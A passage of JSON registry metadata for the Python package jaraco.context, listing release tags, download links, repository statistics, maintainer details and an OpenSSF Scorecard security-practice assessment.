o/jaraco.context/releases/tag/v4.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v4.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.2.0/manifests"},{"name":"v4.1.2","sha":"c3a9b7393ed9479dab7b02a44242ae2b017c4933","kind":"tag","published_at":"2022-07-14T05:04:26.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v4.1.2","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v4.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v4.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.1.2/manifests"},{"name":"v4.1.1","sha":"4d09b48ade8acc32e3453da928ad1eec5158a5a0","kind":"tag","published_at":"2021-10-31T17:18:09.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v4.1.1","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.1.1/manifests"},{"name":"v4.1.0","sha":"866a1b35d416ca6855f2d068072af53cbf255cc3","kind":"tag","published_at":"2021-10-31T17:08:46.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v4.1.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.1.0/manifests"},{"name":"v4.0.0","sha":"23d17bf1f04b83ef34c8cd0e67d26c2e323f5a58","kind":"tag","published_at":"2021-01-29T02:38:28.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v4.0.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.0.0/manifests"},{"name":"v3.0.0","sha":"e2bb8bd3fe8b3b3ed4a50c4a9f4f1998739bf276","kind":"tag","published_at":"2020-01-10T08:35:45.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v3.0.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v3.0.0/manifests"},{"name":"2.0","sha":"105f81a6204d3a9fbb848675d62be4ef185f36f2","kind":"tag","published_at":"2019-01-01T15:40:50.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/2.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/2.0/manifests"},{"name":"1.8","sha":"193b5a60581b5a63c3d955e002319f114f9a7c8b","kind":"tag","published_at":"2018-11-08T16:42:27.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.8","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.8/manifests"},{"name":"1.7","sha":"d7866113d8d79a541c1f87e2eae975d23d2500ba","kind":"tag","published_at":"2017-11-28T19:27:39.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.7","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.7/manifests"},{"name":"1.6.1","sha":"94f59b63bd5b2f634f0f8061402a884e108153fa","kind":"tag","published_at":"2017-03-21T03:32:35.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.6.1","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.6.1/manifests"},{"name":"1.6","sha":"94f59b63bd5b2f634f0f8061402a884e108153fa","kind":"tag","published_at":"2017-03-21T03:19:34.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.6","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.6/manifests"},{"name":"1.5.2","sha":"9660d84625f7d27f47f23bd33a1e88c6c59c5384","kind":"commit","published_at":"2015-10-30T15:02:08.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.5.2","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.5.2/manifests"},{"name":"1.5.1","sha":"51add8c320bb1869d339ddb5d3e0b0df5185b431","kind":"commit","published_at":"2015-10-30T15:02:04.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.5.1","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.5.1/manifests"},{"name":"1.5","sha":"df1e66e6ff30ee0622b1eb822a4d2ba1663b4ba5","kind":"commit","published_at":"2015-10-30T13:32:37.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.5","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.5/manifests"},{"name":"1.4","sha":"41a57fcc069952a9925b0ac44d66317d679b8e01","kind":"commit","published_at":"2015-10-30T12:59:05.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.4","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.4/manifests"},{"name":"1.3","sha":"89a04a5a4b02f92546eb2bc2bd254dabbd148359","kind":"commit","published_at":"2015-02-22T20:18:53.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.3","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.3/manifests"},{"name":"1.2","sha":"a3363e1918bab3d2b260179f229706296509c1c0","kind":"commit","published_at":"2015-02-16T00:58:16.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.2","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.2/manifests"},{"name":"1.1","sha":"115a8978616e766daace2e0cd50c5db437f3785e","kind":"commit","published_at":"2014-06-17T18:32:26.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.1","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.1/manifests"},{"name":"1.0","sha":"d5be3e1a933b97068f31930f3eeb210895d145e9","kind":"commit","published_at":"2014-02-16T08:42:48.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.0/manifests"}]},"repo_metadata_updated_at":"2026-08-06T19:26:18.579Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":53.35063176895307,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":26.675315884476536},"purl":"pkg:spack/py-jaraco-context","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/spack/py-jaraco-context","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/spack/py-jaraco-context","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/spack/py-jaraco-context/dependencies","status":null,"funding_links":["https://tidelift.com/funding/github/pypi/jaraco.context","https://github.com/sponsors/jaraco"],"critical":null,"issue_metadata":{"last_synced_at":"2026-05-04T03:01:07.388Z","issues_count":10,"pull_requests_count":8,"avg_time_to_close_issue":2735931.4,"avg_time_to_close_pull_request":15088803.8,"issues_closed_count":5,"pull_requests_closed_count":5,"pull_request_authors_count":3,"issue_authors_count":4,"avg_comments_per_issue":0.4,"avg_comments_per_pull_request":0.375,"merged_pull_requests_count":4,"bot_issues_count":0,"bot_pull_requests_count":0,"past_year_issues_count":0,"past_year_pull_requests_count":2,"past_year_avg_time_to_close_issue":null,"past_year_avg_time_to_close_pull_request":null,"past_year_issues_closed_count":0,"past_year_pull_requests_closed_count":0,"past_year_pull_request_authors_count":1,"past_year_issue_authors_count":0,"past_year_avg_comments_per_issue":null,"past_year_avg_comments_per_pull_request":0.0,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":0,"past_year_merged_pull_requests_count":0,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/issues","maintainers":[{"login":"jaraco","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jaraco"}],"active_maintainers":[]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/spack.io/packages/py-jaraco-context/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/spack.io/packages/py-jaraco-context/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/spack.io/packages/py-jaraco-context/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/spack.io/packages/py-jaraco-context/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/spack.io/packages/py-jaraco-context/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/spack.io/packages/py-jaraco-context/codemeta","maintainers":[],"registry":{"name":"spack.io","url":"https://packages.spack.io","ecosystem":"spack","default":true,"packages_count":9303,"maintainers_count":1032,"namespaces_count":0,"keywords_count":3959,"github":"spack","metadata":{"funded_packages_count":510},"icon_url":"https://github.com/spack.png","created_at":"2022-04-04T15:19:23.514Z","updated_at":"2026-08-24T05:06:47.739Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/spack.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/spack.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/spack.io/namespaces"}},{"id":4109494,"name":"github.com/jaraco/jaraco.context","ecosystem":"go","description":"","homepage":null,"licenses":null,"normalized_licenses":[],"repository_url":"https://github.com/jaraco/jaraco.context","keywords_array":[],"namespace":"github.com/jaraco","versions_count":18,"first_release_published_at":"2020-01-10T08:35:40.000Z","latest_release_published_at":"2026-03-20T22:10:55.000Z","latest_release_number":"v6.1.2+incompatible","last_synced_at":"2026-08-24T13:47:13.897Z","created_at":"2022-04-12T13:58:52.138Z","updated_at":"2026-08-24T13:47:13.897Z","registry_url":"https://pkg.go.dev/github.com/jaraco/jaraco.context","install_command":"go get github.com/jaraco/jaraco.context","documentation_url":"https://pkg.go.dev/github.com/jaraco/jaraco.context#section-documentation","metadata":{},"repo_metadata":{"id":46308908,"uuid":"53202327","full_name":"jaraco/jaraco.context","owner":"jaraco","description":null,"archived":false,"fork":false,"pushed_at":"2026-05-03T23:37:03.000Z","size":567,"stargazers_count":3,"open_issues_count":3,"forks_count":6,"subscribers_count":1,"default_branch":"main","last_synced_at":"2026-07-22T01:57:48.493Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/jaraco.png","metadata":{"files":{"readme":"README.rst","changelog":"NEWS.rst","contributing":null,"funding":".github/FUNDING.yml","license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"tidelift":"pypi/jaraco.context"}},"created_at":"2016-03-05T13:22:19.000Z","updated_at":"2026-05-03T23:31:36.000Z","dependencies_parsed_at":"2023-12-26T16:54:58.630Z","dependency_job_id":"3b2b5c91-6e4b-4ab0-91a3-57c8b1e5e15c","html_url":"https://github.com/jaraco/jaraco.context","commit_stats":{"total_commits":501,"total_committers":23,"mean_commits":"21.782608695652176","dds":0.07784431137724546,"last_synced_commit":"733f4e107c9ac42f2b117acfb7915dc42b3e82e5"},"previous_names":[],"tags_count":31,"template":false,"template_full_name":null,"purl":"pkg:github/jaraco/jaraco.context","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/jaraco","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/sbom","scorecard":{"id":505978,"data":{"date":"2025-08-11","repo":{"name":"github.com/jaraco/jaraco.context","commit":"dcbca067e28727894fa38985c7724c76a02792ff"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":4.7,"checks":[{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Code-Review","score":0,"reason":"Found 0/30 approved changesets -- score normalized to 0","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/main.yml:113","Info: topLevel 'contents' permission set to 'read': .github/workflows/main.yml:16"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Maintained","score":0,"reason":"0 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 0","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"SAST","score":0,"reason":"no SAST tool detected","details":["Warn: no pull requests merged into dev branch"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:66: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:84: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:88: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/main.yml:107: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:120: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:122: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:93","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:127","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:72","Info:   0 out of   6 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   1 third-party GitHubAction dependencies pinned","Info:   0 out of   3 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"License","score":0,"reason":"license file not detected","details":["Warn: project does not have a license file"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"Branch-Protection","score":0,"reason":"branch protection not enabled on development/release branches","details":["Warn: branch protection not enabled for branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}}]},"last_synced_at":"2025-08-19T23:15:11.199Z","repository_id":46308908,"created_at":"2025-08-19T23:15:11.199Z","updated_at":"2025-08-19T23:15:11.199Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36327833,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-07-20T02:08:10.276Z","status":"online","status_checked_at":"2026-08-06T02:00:07.852Z","response_time":54,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"jaraco","name":"Jason R. Coombs","uuid":"308610","kind":"user","description":"","email":"jaraco@jaraco.com","website":"https://www.jaraco.com","location":"Pittsburgh, PA, USA","twitter":"jaraco","company":null,"icon_url":"https://avatars.githubusercontent.com/u/308610?u=5b3fdef94d1b0ac7392d17643eaba029f5f13bea\u0026v=4","repositories_count":233,"last_synced_at":"2026-08-06T04:39:36.850Z","metadata":{"has_sponsors_listing":true,"funding":null},"html_url":"https://github.com/jaraco","funding_links":["https://github.com/sponsors/jaraco"],"total_stars":5439,"followers":746,"following":5,"created_at":"2022-11-02T16:21:31.721Z","updated_at":"2026-08-06T04:39:37.156Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/jaraco","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/jaraco/repositories"},"tags":[{"name":"v6.1.2","sha":"098f39c911d4504b2c718f2ff483ae24f1c4d378","kind":"tag","published_at":"2026-03-20T22:10:56.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v6.1.2","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v6.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v6.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.1.2/manifests"},{"name":"v6.1.1","sha":"47979d7b6a55353170f61f3e54d17f5973cb8e1c","kind":"tag","published_at":"2026-03-07T15:43:22.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v6.1.1","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v6.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v6.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.1.1/manifests"},{"name":"v6.1.0","sha":"675aaf5bfb926bdafcded1b0e08ca011d6e0f599","kind":"tag","published_at":"2026-01-13T02:49:19.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v6.1.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v6.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v6.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.1.0/manifests"},{"name":"v6.0.2","sha":"1fe5de1e450556cc68d1d33198f8c7b8791af42d","kind":"tag","published_at":"2025-12-24T19:18:11.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v6.0.2","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v6.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v6.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.0.2/manifests"},{"name":"v6.0.1","sha":"088151eb92eaf8801d027e126d4f7a262e422424","kind":"tag","published_at":"2024-08-20T03:35:36.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v6.0.1","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v6.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v6.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.0.1/manifests"},{"name":"v6.0.0","sha":"d892f531d6707f4